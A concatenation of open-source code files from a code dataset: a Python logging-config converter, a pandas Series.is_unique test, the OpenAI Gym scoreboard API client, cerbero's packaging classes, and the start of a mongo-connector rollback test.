            result = self.configurator.convert(value)
            #If the converted value is different, save for next time
            if value is not result:
                self[key] = result
                if type(result) in (ConvertingDict, ConvertingList,
                                    ConvertingTuple):
                    result.parent = self
                    result.key = key
            return result
        def pop(self, idx=-1):
            value = list.pop(self, idx)
            result = self.configurator.convert(value)
            if value is not result:
                if type(result) in (ConvertingDict, ConvertingList,
                                    ConvertingTuple):
                    # No `result.key` here: the element no longer has a stable
                    # index once popped.
                    result.parent = self
            return result
    class ConvertingTuple(tuple):
        """A converting tuple wrapper."""
        def __getitem__(self, key):
            value = tuple.__getitem__(self, key)
            result = self.configurator.convert(value)
            # Tuples are immutable, so the converted value cannot be saved
            # back; it is re-converted on every access.
            if value is not result:
                if type(result) in (ConvertingDict, ConvertingList,
                                    ConvertingTuple):
                    result.parent = self
                    result.key = key
            return result
    class BaseConfigurator(object):
        """
        The configurator base class which defines some useful defaults.
        """
        # NOTE(review): this class relies on module-level `re`, `sys` and
        # `string_types` being defined elsewhere in this module -- confirm.
        CONVERT_PATTERN = re.compile(r'^(?P<prefix>[a-z]+)://(?P<suffix>.*)$')
        WORD_PATTERN = re.compile(r'^\s*(\w+)\s*')
        DOT_PATTERN = re.compile(r'^\.\s*(\w+)\s*')
        INDEX_PATTERN = re.compile(r'^\[\s*(\w+)\s*\]\s*')
        DIGIT_PATTERN = re.compile(r'^\d+$')
        # Maps a URL-style prefix ('ext://', 'cfg://') to the name of the
        # bound method that performs the conversion.
        value_converters = {
            'ext' : 'ext_convert',
            'cfg' : 'cfg_convert',
        }
        # We might want to use a different one, e.g. importlib
        importer = staticmethod(__import__)
        def __init__(self, config):
            self.config = ConvertingDict(config)
            self.config.configurator = self
        def resolve(self, s):
            """
            Resolve strings to objects using standard import and attribute
            syntax.
            """
            name = s.split('.')
            used = name.pop(0)
            try:
                found = self.importer(used)
                for frag in name:
                    used += '.' + frag
                    try:
                        found = getattr(found, frag)
                    except AttributeError:
                        # The attribute may live in a not-yet-imported
                        # submodule; import it and retry once.
                        self.importer(used)
                        found = getattr(found, frag)
                return found
            except ImportError:
                e, tb = sys.exc_info()[1:]
                v = ValueError('Cannot resolve %r: %s' % (s, e))
                # Preserve the original exception and traceback for debugging.
                v.__cause__, v.__traceback__ = e, tb
                raise v
        def ext_convert(self, value):
            """Default converter for the ext:// protocol."""
            return self.resolve(value)
        def cfg_convert(self, value):
            """Default converter for the cfg:// protocol."""
            # Walks a dotted/indexed path (e.g. 'handlers[0].level') through
            # self.config, consuming *rest* token by token.
            rest = value
            m = self.WORD_PATTERN.match(rest)
            if m is None:
                raise ValueError("Unable to convert %r" % value)
            else:
                rest = rest[m.end():]
                d = self.config[m.groups()[0]]
                #print d, rest
                while rest:
                    m = self.DOT_PATTERN.match(rest)
                    if m:
                        d = d[m.groups()[0]]
                    else:
                        m = self.INDEX_PATTERN.match(rest)
                        if m:
                            idx = m.groups()[0]
                            if not self.DIGIT_PATTERN.match(idx):
                                d = d[idx]
                            else:
                                try:
                                    n = int(idx) # try as number first (most likely)
                                    d = d[n]
                                except TypeError:
                                    # Container rejects int keys; fall back to
                                    # the string form of the index.
                                    d = d[idx]
                    if m:
                        rest = rest[m.end():]
                    else:
                        raise ValueError('Unable to convert '
                                         '%r at %r' % (value, rest))
            #rest should be empty
            return d
        def convert(self, value):
            """
            Convert values to an appropriate type. dicts, lists and tuples are
            replaced by their converting alternatives. Strings are checked to
            see if they have a conversion format and are converted if they do.
            """
            if not isinstance(value, ConvertingDict) and isinstance(value, dict):
                value = ConvertingDict(value)
                value.configurator = self
            elif not isinstance(value, ConvertingList) and isinstance(value, list):
                value = ConvertingList(value)
                value.configurator = self
            elif not isinstance(value, ConvertingTuple) and\
                     isinstance(value, tuple):
                value = ConvertingTuple(value)
                value.configurator = self
            elif isinstance(value, string_types):
                m = self.CONVERT_PATTERN.match(value)
                if m:
                    d = m.groupdict()
                    prefix = d['prefix']
                    converter = self.value_converters.get(prefix, None)
                    if converter:
                        suffix = d['suffix']
                        converter = getattr(self, converter)
                        value = converter(suffix)
            return value
        def configure_custom(self, config):
            """Configure an object with a user-supplied factory."""
            c = config.pop('()')
            if not callable(c):
                c = self.resolve(c)
            props = config.pop('.', None)
            # Check for valid identifiers
            kwargs = dict([(k, config[k]) for k in config if valid_ident(k)])
            result = c(**kwargs)
            # Keys under '.' are set as attributes on the constructed object.
            if props:
                for name, value in props.items():
                    setattr(result, name, value)
            return result
        def as_tuple(self, value):
            """Utility function which converts lists to tuples."""
            if isinstance(value, list):
                value = tuple(value)
            return value
| mit |
datapythonista/pandas | pandas/tests/series/methods/test_is_unique.py | 6 | 1050 | import numpy as np
import pytest
from pandas import Series
from pandas.core.construction import create_series_with_explicit_dtype
@pytest.mark.parametrize(
    "data, expected",
    [
        # 1000 draws from only 10 distinct values: duplicates are guaranteed
        # by the pigeonhole principle, so the result is deterministic.
        (np.random.randint(0, 10, size=1000), False),
        (np.arange(1000), True),
        ([], True),
        ([np.nan], True),
        (["foo", "bar", np.nan], True),
        (["foo", "foo", np.nan], False),
        (["foo", "bar", np.nan, np.nan], False),
    ],
)
def test_is_unique(data, expected):
    # GH#11946 / GH#25180
    # Series.is_unique: a single NaN does not break uniqueness, but repeated
    # NaNs do; empty input counts as unique.
    ser = create_series_with_explicit_dtype(data, dtype_if_empty=object)
    assert ser.is_unique is expected
def test_is_unique_class_ne(capsys):
    # GH#20661
    # is_unique must not compare the stored objects with __ne__; if it did,
    # Foo.__ne__ would raise (or noise would land on stderr, which we check).
    class Foo:
        def __init__(self, val):
            self._value = val
        def __ne__(self, other):
            raise Exception("NEQ not supported")
    with capsys.disabled():
        li = [Foo(i) for i in range(5)]
        ser = Series(li, index=list(range(5)))
        ser.is_unique
    captured = capsys.readouterr()
    assert len(captured.err) == 0
| bsd-3-clause |
d1hotpep/openai_gym | gym/scoreboard/client/api_requestor.py | 7 | 5747 | import json
import platform
import six.moves.urllib as urlparse
from six import iteritems
from gym import error, version
import gym.scoreboard.client
from gym.scoreboard.client import http_client
verify_ssl_certs = True # [SECURITY CRITICAL] only turn this off while debugging
# NOTE: this rebinding shadows the imported http_client *module* with a client
# *instance* for the remainder of this module.
http_client = http_client.RequestsClient(verify_ssl_certs=verify_ssl_certs)
def _build_api_url(url, query):
scheme, netloc, path, base_query, fragment = urlparse.urlsplit(url)
if base_query:
query = '%s&%s' % (base_query, query)
return urlparse.urlunsplit((scheme, netloc, path, query, fragment))
def _strip_nulls(params):
if isinstance(params, dict):
stripped = {}
for key, value in iteritems(params):
value = _strip_nulls(value)
if value is not None:
stripped[key] = value
return stripped
else:
return params
class APIRequestor(object):
    # Builds authenticated HTTP requests against the scoreboard API and
    # translates error responses into the gym.error exception hierarchy.
    def __init__(self, key=None, api_base=None):
        # Both arguments fall back to the module-level gym.scoreboard config.
        self.api_base = api_base or gym.scoreboard.api_base
        self.api_key = key
        self._client = http_client
    def request(self, method, url, params=None, headers=None):
        # Issue the call, then decode/validate the body; returns the parsed
        # response together with the API key actually used.
        rbody, rcode, rheaders, my_api_key = self.request_raw(
            method.lower(), url, params, headers)
        resp = self.interpret_response(rbody, rcode, rheaders)
        return resp, my_api_key
    def handle_api_error(self, rbody, rcode, resp, rheaders):
        # Map HTTP status codes to typed exceptions; always raises.
        # Rate limits were previously coded as 400's with code 'rate_limit'
        if rcode == 429:
            raise error.RateLimitError(
                resp.get('detail'), rbody, rcode, resp, rheaders)
        elif rcode in [400, 404]:
            type = resp.get('type')
            if type == 'about:blank':
                type = None
            raise error.InvalidRequestError(
                resp.get('detail'), type,
                rbody, rcode, resp, rheaders)
        elif rcode == 401:
            raise error.AuthenticationError(
                resp.get('detail'), rbody, rcode, resp,
                rheaders)
        else:
            detail = resp.get('detail')
            # This information will only be returned to developers of
            # the OpenAI Gym Scoreboard.
            dev_info = resp.get('dev_info')
            if dev_info:
                detail = "{}\n\n<dev_info>\n{}\n</dev_info>".format(detail, dev_info['traceback'])
            raise error.APIError(detail, rbody, rcode, resp,
                                 rheaders)
    def request_raw(self, method, url, params=None, supplied_headers=None):
        """
        Mechanism for issuing an API call
        """
        if self.api_key:
            my_api_key = self.api_key
        else:
            my_api_key = gym.scoreboard.api_key
        if my_api_key is None:
            raise error.AuthenticationError("""You must provide an OpenAI Gym API key.
(HINT: Set your API key using "gym.scoreboard.api_key = .." or "export OPENAI_GYM_API_KEY=..."). You can find your API key in the OpenAI Gym web interface: https://gym.openai.com/settings/profile.""")
        abs_url = '%s%s' % (self.api_base, url)
        if params:
            encoded_params = json.dumps(_strip_nulls(params))
        else:
            encoded_params = None
        # GET/DELETE carry the JSON-encoded params in the query string;
        # POST carries them in the request body.
        if method == 'get' or method == 'delete':
            if params:
                abs_url = _build_api_url(abs_url, encoded_params)
            post_data = None
        elif method == 'post':
            post_data = encoded_params
        else:
            raise error.APIConnectionError(
                'Unrecognized HTTP method %r. This may indicate a bug in the '
                'OpenAI Gym bindings. Please contact gym@openai.com for '
                'assistance.' % (method,))
        # User-agent metadata; platform probes can fail on exotic systems,
        # so probe failures are recorded in-band instead of raised.
        ua = {
            'bindings_version': version.VERSION,
            'lang': 'python',
            'publisher': 'openai',
            'httplib': self._client.name,
        }
        for attr, func in [['lang_version', platform.python_version],
                           ['platform', platform.platform]]:
            try:
                val = func()
            except Exception as e:
                val = "!! %s" % (e,)
            ua[attr] = val
        headers = {
            'Openai-Gym-User-Agent': json.dumps(ua),
            'User-Agent': 'Openai-Gym/v1 PythonBindings/%s' % (version.VERSION,),
            'Authorization': 'Bearer %s' % (my_api_key,)
        }
        if method == 'post':
            headers['Content-Type'] = 'application/json'
        # Caller-supplied headers take precedence over the defaults above.
        if supplied_headers is not None:
            for key, value in supplied_headers.items():
                headers[key] = value
        rbody, rcode, rheaders = self._client.request(
            method, abs_url, headers, post_data)
        return rbody, rcode, rheaders, my_api_key
    def interpret_response(self, rbody, rcode, rheaders):
        # Decode the response body (plain text passes through; everything
        # else is treated as JSON) and raise on non-2xx status codes.
        content_type = rheaders.get('Content-Type', '')
        if content_type.startswith('text/plain'):
            # Pass through plain text
            resp = rbody
            if not (200 <= rcode < 300):
                self.handle_api_error(rbody, rcode, {}, rheaders)
        else:
            # TODO: Be strict about other Content-Types
            try:
                if hasattr(rbody, 'decode'):
                    rbody = rbody.decode('utf-8')
                resp = json.loads(rbody)
            except Exception:
                raise error.APIError(
                    "Invalid response body from API: %s "
                    "(HTTP response code was %d)" % (rbody, rcode),
                    rbody, rcode, rheaders)
            if not (200 <= rcode < 300):
                self.handle_api_error(rbody, rcode, resp, rheaders)
        return resp
| mit |
multipath-rtp/cerbero | cerbero/packages/package.py | 1 | 23059 | # cerbero - a multi-platform build system for Open Source software
# Copyright (C) 2012 Andoni Morales Alastruey <ylatuya@gmail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
import os
from cerbero.build.filesprovider import FilesProvider
from cerbero.enums import License, Platform
from cerbero.packages import PackageType
from cerbero.utils import remove_list_duplicates
class PackageBase(object):
    '''
    Base class for packages with the common field to describe a package
    @cvar name: name of the package
    @type name: str
    @cvar shortdesc: Short description of the package
    @type shortdesc: str
    @cvar longdesc: Long description of the package
    @type longdesc: str
    @cvar version: version of the package
    @type version: str
    @cvar codename: codename of the release
    @type codename: str
    @cvar uuid: unique id for this package
    @type uuid: str
    @cvar license: package license
    @type license: License
    @cvar vendor: vendor for this package
    @type vendor: str
    @cvar org: organization for this package (eg: net.foo.bar)
    @type org: str
    @cvar url: url for this package
    @type url: str
    @cvar sys_deps: system dependencies for this package
    @type sys_deps: dict
    @cvar sys_deps_devel: development system dependencies for this package
    @type sys_deps_devel: dict
    @cvar ignore_package_prefix: don't use the package prefix set in the config
    @type ignore_package_prefix: bool
    @cvar relocate_osx_binaries: relocate osx binaries
    @type relocate_osx_binaries: bool
    @cvar resources_license: filename of the .txt license file
    @type resources_license: str
    @cvar resources_license_unwrapped: filename of the .txt license file
        without the 80 chars wrapping
    @type resources_license_unwrapped: str
    @cvar resources_license_rtf: filename of .rtf license file
    @type resources_license_rtf: str
    @cvar resources_icon: filename of the .ico icon
    @type resources_icon: str
    @cvar resources_icon_icns: filename of the .icsn icon
    @type resources_icon_icns: str
    @cvar resources_background = filename of the background image
    @type resources_background = str
    @cvar resources_preinstall = filename for the pre-installation script
    @type resources_preinstall = str
    @cvar resources_postinstall = filename for the post-installation script
    @type resources_postinstall = str
    @cvar resources_postremove = filename for the post-remove script
    @type resources_postremove = str
    '''
    name = 'default'
    shortdesc = 'default'
    longdesc = 'default'
    version = '1.0'
    codename = None
    org = 'default'
    uuid = None
    license = License.GPL
    vendor = 'default'
    url = 'default'
    ignore_package_prefix = False
    sys_deps = {}
    sys_deps_devel = {}
    relocate_osx_binaries = True
    resources_license = 'license.txt'
    resources_license_unwrapped = 'license_unwrapped.txt'
    resources_license_rtf = 'license.txt'
    resources_icon = 'icon.ico'
    resources_icon_icns = 'icon.icns'
    resources_background = 'background.png'
    resources_preinstall = 'preinstall'
    resources_postinstall = 'postinstall'
    resources_postremove = 'postremove'
    def __init__(self, config, store):
        self.config = config
        self.store = store
        self.package_mode = PackageType.RUNTIME
    def prepare(self):
        '''
        Can be overrided by subclasses to modify conditionally the package
        '''
        pass
    def load_files(self):
        pass
    def package_dir(self):
        '''
        Gets the directory path where this package is stored
        @return: directory path
        @rtype: str
        '''
        # self.__file__ is expected to be set by the packages loader when the
        # package definition file is imported.
        return os.path.dirname(self.__file__)
    def relative_path(self, path):
        '''
        Gets a path relative to the package's directory
        @return: absolute path relative to the package's directory
        @rtype: str
        '''
        return os.path.abspath(os.path.join(self.package_dir(), path))
    def files_list(self):
        # Fixed: 'raise NotImplemented(...)' raised a TypeError (the
        # NotImplemented singleton is not callable) instead of the intended
        # NotImplementedError. Same fix in the two methods below.
        raise NotImplementedError("'files_list' must be implemented by "
                                  "subclasses")
    def devel_files_list(self):
        raise NotImplementedError("'devel_files_list' must be implemented by "
                                  "subclasses")
    def all_files_list(self):
        raise NotImplementedError("'all_files_list' must be implemented by "
                                  "subclasses")
    def post_install(self, paths):
        pass
    def set_mode(self, package_type):
        self.package_mode = package_type
    def get_install_dir(self):
        # Prefer a per-platform install dir when the subclass provides one;
        # fall back to the global configuration otherwise. The narrowed
        # except replaces a bare 'except:' that also swallowed unrelated
        # errors (e.g. KeyboardInterrupt).
        try:
            return self.install_dir[self.config.target_platform]
        except (AttributeError, KeyError, TypeError):
            return self.config.install_dir
    def get_sys_deps(self, package_mode=None):
        '''
        Lists the system dependencies matching the target distro (or distro
        version) for the requested package mode.
        '''
        package_mode = package_mode or self.package_mode
        # Default to an empty mapping so an unknown package mode yields []
        # instead of an UnboundLocalError.
        sys_deps = {}
        if package_mode == PackageType.RUNTIME:
            sys_deps = self.sys_deps
        if package_mode == PackageType.DEVEL:
            sys_deps = self.sys_deps_devel
        # The more specific distro-version entry wins over the distro entry.
        if self.config.target_distro_version in sys_deps:
            return sys_deps[self.config.target_distro_version]
        if self.config.target_distro in sys_deps:
            return sys_deps[self.config.target_distro]
        return []
    def identifier(self):
        return '%s.%s.%s' % (self.org, self.config.target_arch, self.name)
    def __str__(self):
        return self.name
    def __getattribute__(self, name):
        # Post-processes a few attributes on access: resource filenames are
        # resolved relative to the package dir, and the name/description/uuid
        # are adjusted for the current package mode (runtime vs devel).
        attr = object.__getattribute__(self, name)
        # Return relative path for resources
        if name.startswith('resources'):
            if attr is not None:
                attr = self.relative_path(attr)
        elif name == 'name':
            attr += self.package_mode
        elif name == 'shortdesc':
            if self.package_mode == PackageType.DEVEL:
                attr += ' (Development Files)'
        elif name == 'uuid':
            if self.package_mode == PackageType.DEVEL:
                if attr is not None:
                    # Used the change the upgrade code for the devel package
                    uuid = list(attr)
                    if uuid[0] != '0':
                        uuid[0] = '0'
                    else:
                        uuid[0] = '1'
                    attr = ''.join(uuid)
        return attr
class Package(PackageBase):
    '''
    Describes a set of files to produce distribution packages for the
    different target platforms. It provides the first level of packaging
    allowing to create modular installers by aggregating several of them.
    On Windows it will create a Merge Module (.msm) that can be easily
    integrated in an installer (.msi).
    On OS X, it will produce a Package (.pkg) that can be integrated
    in a MetaPackager.
    On Linux it will create regular distribution packages such as a .deb on
    Debian or a .rpm on RedHat
    @cvar deps: list of packages dependencies
    @type deps: list
    @cvar files: list of files included in this package
    @type files: list
    @cvar platform_files: dict of platform files included in this package
    @type platform_files: dict
    @cvar files_devel: list of devel files included in this package
    @type files_devel: list
    @cvar platform_files_devel: dict of platform devel files included in
        this package
    @type platform_files_devel: dict
    @cvar osx_framework_library: name and link for the Framework library
    @type osx_framework_library: tuple
    '''
    deps = list()
    files = list()
    platform_files = dict()
    files_devel = list()
    platform_files_devel = dict()
    osx_framework_library = None
    def __init__(self, config, store, cookbook):
        PackageBase.__init__(self, config, store)
        self.cookbook = cookbook
    def load_files(self):
        # Merge the generic file lists with the ones specific to the current
        # target platform, then index them by recipe name.
        self._files = self.files + \
            self.platform_files.get(self.config.target_platform, [])
        self._files_devel = self.files_devel + \
            self.platform_files_devel.get(self.config.target_platform, [])
        self._parse_files()
    def recipes_dependencies(self, use_devel=True):
        # File entries have the form 'recipe[:category...]'; keep the recipe
        # part only, and recurse into dependent packages.
        # NOTE: dict.iteritems/has_key used throughout -- this module is
        # Python 2 only.
        deps = [x.split(':')[0] for x in self._files]
        if use_devel:
            deps.extend([x.split(':')[0] for x in self._files_devel])
        for name in self.deps:
            p = self.store.get_package(name)
            deps += p.recipes_dependencies(use_devel)
        return remove_list_duplicates(deps)
    def recipes_licenses(self):
        return self._list_licenses(self._recipes_files)
    def devel_recipes_licenses(self):
        # Devel licenses plus, for recipes whose 'libs' category is packaged,
        # their per-category licenses.
        licenses = self._list_licenses(self._recipes_files_devel)
        for recipe_name, categories in self._recipes_files.iteritems():
            # also add development licenses for recipe from which used the
            # 'libs' category
            if len(categories) == 0 or FilesProvider.LIBS_CAT in categories:
                r = self.cookbook.get_recipe(recipe_name)
                if recipe_name in licenses:
                    licenses[recipe_name].update(
                        r.list_licenses_by_categories(categories))
                else:
                    licenses[recipe_name] = \
                        r.list_licenses_by_categories(categories)
        return licenses
    def files_list(self):
        # No categories means "all distributable files" of the recipe.
        files = []
        for recipe_name, categories in self._recipes_files.iteritems():
            recipe = self.cookbook.get_recipe(recipe_name)
            if len(categories) == 0:
                rfiles = recipe.dist_files_list()
            else:
                rfiles = recipe.files_list_by_categories(categories)
            files.extend(rfiles)
        return sorted(files)
    def devel_files_list(self):
        files = []
        for recipe, categories in self._recipes_files.iteritems():
            # only add development files for recipe from which used the 'libs'
            # category
            if len(categories) == 0 or FilesProvider.LIBS_CAT in categories:
                rfiles = self.cookbook.get_recipe(recipe).devel_files_list()
                files.extend(rfiles)
        for recipe, categories in self._recipes_files_devel.iteritems():
            recipe = self.cookbook.get_recipe(recipe)
            if not categories:
                rfiles = recipe.devel_files_list()
            else:
                rfiles = recipe.files_list_by_categories(categories)
            files.extend(rfiles)
        return sorted(files)
    def all_files_list(self):
        files = self.files_list()
        files.extend(self.devel_files_list())
        return sorted(files)
    def _parse_files(self):
        # Build {recipe_name: [categories...]} maps from the raw
        # 'recipe:cat1:cat2' entries; an entry without categories maps to [].
        self._recipes_files = {}
        for r in self._files:
            l = r.split(':')
            if self._recipes_files.has_key(l[0]):
                self._recipes_files[l[0]] += l[1:]
            else:
                self._recipes_files[l[0]] = l[1:]
        self._recipes_files_devel = {}
        for r in self._files_devel:
            l = r.split(':')
            if self._recipes_files_devel.has_key(l[0]):
                self._recipes_files_devel[l[0]] += l[1:]
            else:
                self._recipes_files_devel[l[0]] = l[1:]
    def _list_licenses(self, recipes_files):
        licenses = {}
        for recipe_name, categories in recipes_files.iteritems():
            r = self.cookbook.get_recipe(recipe_name)
            # Package.files|files_devel|platform_files|platform_files_devel = \
            #       [recipe:category]
            # => licenses = {recipe_name: {category: category_licenses}}
            # Package.files|files_devel|platform_files|platform_files_devel = \
            #       [recipe]
            # => licenses = {recipe_name: {None: recipe_licenses}}
            licenses[recipe_name] = r.list_licenses_by_categories(categories)
        return licenses
class MetaPackage(PackageBase):
    '''
    Group of L{cerbero.packages.package.Package} used to build a modular
    installer package.
    On Windows it will result in a .msi installer that aggregates
    Merge Modules created from a L{cerbero.packages.package.Package}.
    On OS X it will result in a MetaPackage that aggregates .pkg packages
    created from a L{cerbero.packages.package.Package}.
    On Linux it will result in rpm and deb meta-packages, with the packages
    created as dependencies.
    @cvar packages: list of packages grouped in this meta package
    @type packages: list
    @cvar platform_packages: list of platform packages
    @type platform_packages: dict
    @cvar root_env_var: name of the environment variable with the prefix
    @type root_env_var: str
    @cvar sdk_version: SDK version. This version will be used for the SDK
        versioning and can differ from the installer one.
    @type sdk_version: str
    @cvar resources_wix_installer: wix installer template file
    @type resources_wix_installer: string
    @cvar resources_distribution: Distribution XML template file
    @type resources_distribution: string
    @cvar user_resources: folders included in the .dmg for iOS packages
    @type user_resources: list
    '''
    packages = []
    root_env_var = 'CERBERO_SDK_ROOT'
    platform_packages = {}
    sdk_version = '1.0'
    resources_wix_installer = None
    resources_distribution = 'distribution.xml'
    user_resources = []
    def __init__(self, config, store):
        PackageBase.__init__(self, config, store)
    def list_packages(self):
        # Each entry in self.packages is a tuple whose first element is the
        # package name.
        return [p[0] for p in self.packages]
    def recipes_dependencies(self, use_devel=True):
        # Aggregate the recipe dependencies of every grouped package.
        deps = []
        for package in self.store.get_package_deps(self.name, True):
            deps.extend(package.recipes_dependencies(use_devel))
        return remove_list_duplicates(deps)
    def files_list(self):
        return self._list_files(Package.files_list)
    def devel_files_list(self):
        return self._list_files(Package.devel_files_list)
    def all_files_list(self):
        return self._list_files(Package.all_files_list)
    def get_wix_upgrade_code(self):
        # wix_upgrade_code is expected to be defined by subclasses as a
        # {package_mode: {target_arch: code}} mapping -- TODO confirm.
        m = self.package_mode
        p = self.config.target_arch
        return self.wix_upgrade_code[m][p]
    def _list_files(self, func):
        # for each package, call the function that list files
        files = []
        for package in self.store.get_package_deps(self.name):
            files.extend(func(package))
        files.sort()
        return files
    def __getattribute__(self, name):
        # 'packages' is virtual: the generic list is extended on the fly with
        # the entries registered for the current target platform.
        if name == 'packages':
            attr = PackageBase.__getattribute__(self, name)
            ret = attr[:]
            platform_attr_name = 'platform_%s' % name
            if hasattr(self, platform_attr_name):
                platform_attr = PackageBase.__getattribute__(self,
                        platform_attr_name)
                if self.config.target_platform in platform_attr:
                    platform_list = platform_attr[self.config.target_platform]
                    ret.extend(platform_list)
            return ret
        else:
            return PackageBase.__getattribute__(self, name)
class SDKPackage(MetaPackage):
    '''
    Installer builder for SDK's.
    On Windows the generated installer exports the install prefix through the
    environment variable named by root_env_var and through a registry key, so
    that installers depending on this SDK can set up their environment and
    verify requirements in their pre-installation step.
    On OS X it creates the usual Framework bundle layout, with the 'Versions'
    and 'Current' directories for versioning plus 'Headers' and 'Libraries'
    linking to the current version of the framework.
    On Linux everything just works without extra hacks ;)
    @cvar root_env_var: name of the environment variable with the prefix
    @type root_env_var: str
    @cvar osx_framework_library: (name, path) of the lib used for the Framework
    @type osx_framework_library: tuple
    '''
    root_env_var = 'CERBERO_SDK_ROOT_%(arch)s'
    osx_framework_library = None
    def __init__(self, config, store):
        MetaPackage.__init__(self, config, store)
    def get_root_env_var(self):
        # Substitute the target architecture into the template, then
        # upper-case the result to follow environment-variable conventions.
        expanded = self.root_env_var % {'arch': self.config.target_arch}
        return expanded.upper()
class InstallerPackage(MetaPackage):
    '''
    Creates an installer for a target SDK to extend it.
    @cvar windows_sdk_reg: name of the required SDK
    @type windows_sdk_reg: str
    '''
    # Registry name of the SDK this installer extends (Windows only);
    # None means no SDK requirement.
    windows_sdk_reg = None
    def __init__(self, config, store):
        MetaPackage.__init__(self, config, store)
class App(Package):
    '''
    Create packages for applications.

    An App package will not include development files and binaries could
    be stripped when required. The App packager will not create a development
    version.
    On linux it will work in the same way as a MetaPackage, creating a package
    with the application's recipe files and adding packages dependencies to be
    managed by the distribution's package manager.
    On OS X and Windows, the dependencies could be embeded in the installer
    itself, creating an Application bundle on OS X and main menu shortcuts on
    Windows, relocating the binaries properly.

    @cvar app_name: name used for the application
    @type app_name: str
    @cvar app_recipe: recipe that builds the application project
    @type app_recipe: str
    @cvar deps: list of packages dependencies
    @type deps: list
    @cvar embed_deps: include dependencies in the final package
    @type embed_deps: boolean
    @cvar commands: the application commands; the first one is used for the
                    main executable
    @type commands: list
    @cvar wrapper: suffix filename for the main executable wrapper
    @type wrapper: str
    @cvar strip: strip binaries for this package
    @type strip: bool
    @cvar strip_dirs: directories to strip
    @type strip_dirs: list
    @cvar strip_excludes: files that won't be stripped
    @type strip_excludes: list
    @cvar resources_info_plist: Info.plist template file
    @type resources_info_plist: string
    @cvar resources_distribution: Distribution XML template file
    @type resources_distribution: string
    @cvar osx_create_dmg: Packages the app in a dmg
    @type osx_create_dmg: bool
    @cvar osx_create_pkg: Packages the app in a pkg
    @type osx_create_pkg: bool
    '''

    app_name = None
    app_recipe = None
    embed_deps = True
    deps = []
    commands = []  # list of tuples ('CommandName', path/to/binary')
    wrapper = 'app_wrapper.tpl'
    resources_wix_installer = None
    strip = False
    strip_dirs = ['bin']
    strip_excludes = []
    resources_info_plist = 'Info.plist'
    resources_distribution = 'distribution.xml'
    osx_create_dmg = True
    osx_create_pkg = True

    def __init__(self, config, store, cookbook):
        Package.__init__(self, config, store, cookbook)
        self._app_recipe = self.cookbook.get_recipe(self.app_recipe)
        self.title = self.name

    def recipes_dependencies(self, use_devel=True):
        """Return the recipes required by this package's dependencies and by
        the application recipe itself, without duplicates."""
        deps = []
        for dep in self.deps:
            package = self.store.get_package(dep)
            deps.extend(package.recipes_dependencies(use_devel))
        if self.app_recipe is not None:
            deps.append(self.app_recipe)
        return remove_list_duplicates(deps)

    def files_list(self):
        """Return the sorted list of all files shipped by this App package."""
        files = Package.files_list(self)
        if self.embed_deps:
            # Collect direct dependencies and, by extending the list while
            # iterating it, their transitive dependencies as well; the
            # set() afterwards removes the duplicates this produces.
            packages_deps = [self.store.get_package(x) for x in self.deps]
            for package in packages_deps:
                packages_deps.extend(self.store.get_package_deps(package))
            packages_deps = list(set(packages_deps))
            for package in packages_deps:
                files.extend(package.files_list())
        # Also include all the libraries provided by the recipes we depend
        # on.
        for recipe in self.cookbook.list_recipe_deps(self.app_recipe):
            files.extend(recipe.libraries())
            files.extend(recipe.files_list_by_category(FilesProvider.PY_CAT))
            files.extend(recipe.files_list_by_category(FilesProvider.TYPELIB_CAT))
        files.extend(self._app_recipe.files_list())
        files.sort()
        return files

    def devel_files_list(self):
        # App packages never ship development files.
        return []

    def all_files_list(self):
        return self.files_list()

    def recipes_licenses(self):
        # FIXME
        return {}

    def devel_recipes_licenses(self):
        # FIXME
        return {}

    def get_wix_upgrade_code(self):
        """Return the WiX upgrade code for the current package mode/arch."""
        m = self.package_mode
        p = self.config.target_arch
        return self.wix_upgrade_code[m][p]

    def get_commands(self):
        # NOTE(review): 'commands' defaults to a list but is accessed with
        # .get(); subclasses apparently override it with a dict keyed by
        # platform -- confirm against existing recipes.
        return self.commands.get(self.config.target_platform, [])

    def get_wrapper(self, cmd, wrapper=None):
        """Render the executable wrapper template for a command.

        @param cmd: the command the wrapper should execute
        @param wrapper: optional wrapper filename overriding self.wrapper
        @return: the rendered wrapper content, or None if the template
                 file does not exist
        """
        if self.config.target_platform == Platform.WINDOWS:
            platform = 'win'
        else:
            platform = 'unix'
        if wrapper is not None:
            wrapper_file = self.relative_path('%s_%s' % (platform, wrapper))
        else:
            wrapper_file = os.path.join(self.config.data_dir, 'templates',
                                        '%s_%s' % (self.wrapper, platform))
        if not os.path.exists(wrapper_file):
            return None
        with open(wrapper_file, 'r') as f:
            content = f.read()
            # Bug fix: the 'cmd' placeholder was previously filled with
            # self.config.prefix, leaving the 'cmd' argument unused and
            # producing wrappers that ran the prefix instead of the command.
            content = content % {'prefix': self.config.prefix,
                                 'py_prefix': self.config.py_prefix,
                                 'cmd': cmd}
        return content

    def __getattribute__(self, name):
        """Resolve 'deps' merging in the platform-specific dependencies
        listed in 'platform_deps' for the current target platform."""
        if name == 'deps':
            attr = PackageBase.__getattribute__(self, name)
            ret = attr[:]
            platform_attr_name = 'platform_%s' % name
            if hasattr(self, platform_attr_name):
                platform_attr = PackageBase.__getattribute__(self,
                        platform_attr_name)
                if self.config.target_platform in platform_attr:
                    platform_list = platform_attr[self.config.target_platform]
                    ret.extend(platform_list)
            return ret
        else:
            return PackageBase.__getattribute__(self, name)
| lgpl-2.1 |
orchardmile/mongo-connector | tests/test_rollbacks.py | 14 | 11412 | """Test Mongo Connector's behavior when its source MongoDB system is
experiencing a rollback.
"""
import os
import sys
import time
from pymongo.read_preferences import ReadPreference
from pymongo import MongoClient
sys.path[0:0] = [""]
from mongo_connector.util import retry_until_ok
from mongo_connector.locking_dict import LockingDict
from mongo_connector.doc_managers.doc_manager_simulator import DocManager
from mongo_connector.oplog_manager import OplogThread
from tests import unittest, STRESS_COUNT
from tests.util import assert_soon
from tests.setup_cluster import ReplicaSet
class TestRollbacks(unittest.TestCase):
    """Regression tests for rollback handling in the OplogThread.

    Each test drives a two-node replica set through a failover, writes
    documents that only the interim primary ever saw, then brings the
    original primary back and verifies that those writes are rolled back
